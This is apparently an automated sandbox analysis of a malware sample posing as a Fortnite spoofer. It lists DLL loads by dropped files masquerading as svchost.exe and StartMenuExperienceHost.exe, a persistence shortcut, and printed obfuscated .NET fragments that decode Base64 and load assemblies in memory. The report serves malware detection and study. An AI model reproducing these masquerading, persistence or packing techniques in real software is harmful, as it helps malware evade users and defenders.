                            Source: C:\Windows\System32\svchost.exeSection loaded: phoneutil.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: sxs.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: scrrun.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: linkinfo.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: ntshrui.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: cscapi.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: textinputframework.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: coreuicomponents.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: avicap32.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: msvfw32.dllJump to behavior
                            Source: C:\Windows\StartMenuExperienceHost.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: w32time.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: logoncli.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: vmictimeprovider.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wbemcomn.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: amsi.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: profapi.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wscapi.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: urlmon.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: iertutil.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: srvcli.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: netutils.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: slc.dll
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sppc.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\StartMenuExperienceHost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                            Source: svchost.lnk.12.drLNK file: ..\..\..\..\..\..\Local\Temp\svchost.exe
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: 18sFhgSyVK.exeStatic PE information: Image base 0x140000000 > 0x60000000
                            Source: 18sFhgSyVK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                            Source: 18sFhgSyVK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                            Source: 18sFhgSyVK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                            Source: 18sFhgSyVK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                            Source: 18sFhgSyVK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                            Source: 18sFhgSyVK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                            Source: 18sFhgSyVK.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                            Source: 18sFhgSyVK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                            Source: Binary string: C:\Users\zinc\Desktop\Fortnite-Perm-Spoofer-main\x64\Release\spoofer.pdb&& source: 18sFhgSyVK.exe
                            Source: Binary string: C:\Users\zinc\Desktop\Fortnite-Perm-Spoofer-main\x64\Release\spoofer.pdb source: 18sFhgSyVK.exe
                            Source: 18sFhgSyVK.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                            Source: 18sFhgSyVK.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                            Source: 18sFhgSyVK.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                            Source: 18sFhgSyVK.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                            Source: 18sFhgSyVK.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                            Data Obfuscation

                            barindex
                            .NET source code contains method to dynamically call methods (often used by packers)
                            Source: StartMenuExperienceHost.exe.4.dr, FntRTCv7ZktbuAMyNaiZ3ivt9bwnGTHU0c1lHAs936cKmGjarAqBsIBDwBugWGcfu8uAIkoE.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{RrgnVVd2FggAleXTu6jzSzDBhYAhkFKt0RWLUcYy.tM3bvFnn6Mbt5WifsvxJGCRJaGCs9xZx7ZGfykhl,RrgnVVd2FggAleXTu6jzSzDBhYAhkFKt0RWLUcYy._3769zkLfcwVNUIC9LIejrz9yUfAKE6U1Ph3o3QGC,RrgnVVd2FggAleXTu6jzSzDBhYAhkFKt0RWLUcYy.Oxyq8pdntw8n8wlgK4cC1UviEbCs6cWoFWExp6r1,RrgnVVd2FggAleXTu6jzSzDBhYAhkFKt0RWLUcYy.qkxNRIW066TVI4rVu5JkoNIJP7mcZDkeuXbO8Bdo,k7DEUthG3QSrccC.xEDeLKp11QUlOfC()}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: StartMenuExperienceHost.exe.4.dr, FntRTCv7ZktbuAMyNaiZ3ivt9bwnGTHU0c1lHAs936cKmGjarAqBsIBDwBugWGcfu8uAIkoE.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{_6uAygstEjpWYqFVRDShR2PLcfPk0CM4htkRpQYutB8HqFsvC8V7WWEeCqyXPAOkfLEh39tNV[2],k7DEUthG3QSrccC.vWTlVsnh1Kh1jPA(Convert.FromBase64String(_6uAygstEjpWYqFVRDShR2PLcfPk0CM4htkRpQYutB8HqFsvC8V7WWEeCqyXPAOkfLEh39tNV[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: svchost.exe.12.dr, FntRTCv7ZktbuAMyNaiZ3ivt9bwnGTHU0c1lHAs936cKmGjarAqBsIBDwBugWGcfu8uAIkoE.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{RrgnVVd2FggAleXTu6jzSzDBhYAhkFKt0RWLUcYy.tM3bvFnn6Mbt5WifsvxJGCRJaGCs9xZx7ZGfykhl,RrgnVVd2FggAleXTu6jzSzDBhYAhkFKt0RWLUcYy._3769zkLfcwVNUIC9LIejrz9yUfAKE6U1Ph3o3QGC,RrgnVVd2FggAleXTu6jzSzDBhYAhkFKt0RWLUcYy.Oxyq8pdntw8n8wlgK4cC1UviEbCs6cWoFWExp6r1,RrgnVVd2FggAleXTu6jzSzDBhYAhkFKt0RWLUcYy.qkxNRIW066TVI4rVu5JkoNIJP7mcZDkeuXbO8Bdo,k7DEUthG3QSrccC.xEDeLKp11QUlOfC()}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: svchost.exe.12.dr, FntRTCv7ZktbuAMyNaiZ3ivt9bwnGTHU0c1lHAs936cKmGjarAqBsIBDwBugWGcfu8uAIkoE.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{_6uAygstEjpWYqFVRDShR2PLcfPk0CM4htkRpQYutB8HqFsvC8V7WWEeCqyXPAOkfLEh39tNV[2],k7DEUthG3QSrccC.vWTlVsnh1Kh1jPA(Convert.FromBase64String(_6uAygstEjpWYqFVRDShR2PLcfPk0CM4htkRpQYutB8HqFsvC8V7WWEeCqyXPAOkfLEh39tNV[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                            .NET source code contains potential unpacker
                            Source: StartMenuExperienceHost.exe.4.dr, FntRTCv7ZktbuAMyNaiZ3ivt9bwnGTHU0c1lHAs936cKmGjarAqBsIBDwBugWGcfu8uAIkoE.cs.Net Code: CQN4IzuYh6n5hW0DT5CXNjlmgQqGp0FQw5BTdVkNg8hnfElRcRaeHbBkrnFuMbes2eJ5RuKT System.AppDomain.Load(byte[])
                            Source: StartMenuExperienceHost.exe.4.dr, FntRTCv7ZktbuAMyNaiZ3ivt9bwnGTHU0c1lHAs936cKmGjarAqBsIBDwBugWGcfu8uAIkoE.cs.Net Code: VKBoLhBkQ3Oc29IeoWXz0kc5bvaSAPm1P1AjrxLpWxBXkVKLRal0OjsbHNKpPe6krcQNY5Ud System.AppDomain.Load(byte[])
                            Source: StartMenuExperienceHost.exe.4.dr, FntRTCv7ZktbuAMyNaiZ3ivt9bwnGTHU0c1lHAs936cKmGjarAqBsIBDwBugWGcfu8uAIkoE.cs.Net Code: VKBoLhBkQ3Oc29IeoWXz0kc5bvaSAPm1P1AjrxLpWxBXkVKLRal0OjsbHNKpPe6krcQNY5Ud
                            Source: svchost.exe.12.dr, FntRTCv7ZktbuAMyNaiZ3ivt9bwnGTHU0c1lHAs936cKmGjarAqBsIBDwBugWGcfu8uAIkoE.cs.Net Code: CQN4IzuYh6n5hW0DT5CXNjlmgQqGp0FQw5BTdVkNg8hnfElRcRaeHbBkrnFuMbes2eJ5RuKT System.AppDomain.Load(byte[])
                            Source: svchost.exe.12.dr, FntRTCv7ZktbuAMyNaiZ3ivt9bwnGTHU0c1lHAs936cKmGjarAqBsIBDwBugWGcfu8uAIkoE.cs.Net Code: VKBoLhBkQ3Oc29IeoWXz0kc5bvaSAPm1P1AjrxLpWxBXkVKLRal0OjsbHNKpPe6krcQNY5Ud System.AppDomain.Load(byte[])
                            Source: svchost.exe.12.dr, FntRTCv7ZktbuAMyNaiZ3ivt9bwnGTHU0c1lHAs936cKmGjarAqBsIBDwBugWGcfu8uAIkoE.cs.Net Code: VKBoLhBkQ3Oc29IeoWXz0kc5bvaSAPm1P1AjrxLpWxBXkVKLRal0OjsbHNKpPe6krcQNY5Ud
                            Source: StartMenuExperienceHost.exe.4.dr, YuWwnU774i1WXQz.csHigh entropy of concatenated method names: 'zoPwAT5CIxrIHgi', 'FKGpPlnraXbM1ZF', 'jXiKhZ2WRX9rqip', '_4YgkMx1W2VQBhkBo9H', 'Mtx16zRUzpofifFREl', 'vftrbwcfQzEo1ZL9A3', '_7PBY7FZQF55DjK1Cov', 'TLX2HhdljB2mEAtMSY', 'MIewFAlfiNh37TUukE', 'VlvzphW9ZDbWXg1odi'
                            Source: StartMenuExperienceHost.exe.4.dr, BYZXqCcInfvLxkJ.csHigh entropy of concatenated method names: 'HmYB37sUGn1tzWo', 'SwJtMaiww3xwhlt', '_2Ncrum7fWL0LZSI3UTXJdSgAbrxu50NP', 'KJck06XP8a2RC4x3RbNNtnEWeVWVU5RK', 'o2ayMkAsm2MJl7DzCGVCewxkkEXGw9pv', 'XsgoBl2zFUtxhxO7iFYbTblPAMzBMdo8'
                            Source: StartMenuExperienceHost.exe.4.dr, vxw6fPaLgCWKUy0.csHigh entropy of concatenated method names: 'bsRhaVEy8neLH0G', 'gQeMuKYZfmdfalx', 'a8ZGWF4Ze61pADc', 'BPZ5AL5H8T2eyhW', 'cIvhfw92JPAMmOxZlGFpa6dJWdcGwybE', 'xp2ouzuaCyVa0e3eVHsOzzb0qWY8YtLE', 'ESgVaOnZruQgSXv7dUJbyII9HmUzzpcM', 'lmYfT7g04ToPYZcDY8skWi5KCol1VIKc', 'AfqADcwUoxdRdfpzT2f6Gr6do4dtwHRR', 'WWL0XENC3bSs0kDawIY7qmuVJ47WHNcZ'
                            Source: StartMenuExperienceHost.exe.4.dr, 4YsgSk8wbMoiiRy.csHigh entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', 'kaAfXKhhGgwVbpY', 'ZuyftoEJOIUteV19hRJzXvsttxsbIVQE', 'FXMAjIdHzuejPKublxja7znJenaoewZ4', 'THmHOhpw81AE8MOOZCRn7a0aYF6RPxJZ', 'PEC4vmGtLYWCB1RoZF9K5OzyWH2kigrV'
                            Source: StartMenuExperienceHost.exe.4.dr, RGgnftDWPPpsIjGTcvO1OpP8vWPkDEV58d5cxkAlUabCGJ3GABiiQ81jRyxmvPvrtAm4lXCj.csHigh entropy of concatenated method names: 'ORiC8emOPRQGOXpPv83ulthuW6CVQ6YM4xTAjZ2jPRAoP9wiEOfLSrtcMcVNycVBuUDSk2rB', 'AceLNnYLfssv5xNkhIBxOpI2MxBiQXzE', 'krotEk14oyz0ZE7dRR97UUit8vJqRAkB', 'kRUj6xBlZyurP2lRnqqZjyfmGywk0gbR', 'xsPGLSQ1yo77J0S7jujyES9FLI86EBg1'
                            Source: StartMenuExperienceHost.exe.4.dr, XqLRt2iKMxTUA2h4rXCpIUvAUqRYRR5QrACB1BMG.csHigh entropy of concatenated method names: 'l6xBdqb0bhFOmil6dHylKViFfsdgGKvRJk6esdwo', 'SNU29fbBoCjckaVAB9UgMQV0JgKVgsN6yzd6huJ3', 'qc88vInX2XwZwshFbCgXe3OVAw7r9h3qu6VvVOyz', 'Vlcok3h04GLc88cDOnru26nx5ciYbJJaxeObu95U', '_7fyohtCQd9HltSGvlCh4tY4hXjO9K4W56xjZOh0y', 'FYvEJEAauCvrzK4SAEAXEftUcg1Y3DLHHy84Q6E4', 'P8qnLG95P6quuFElwnzpmvpx1UFiMYwaN0X3Tl5f', 'TdTY4rZk0TCcYFml7X4XfCA4ztEWOTb43FyTMja1', 'Qq5pVkiqLGsEZ5anpF0Ym6XKaLY63thUytWoxwSR', 'Jfmk5g6q8jjPsHj0gP4kKAcor9y15M3BKKlOda82'
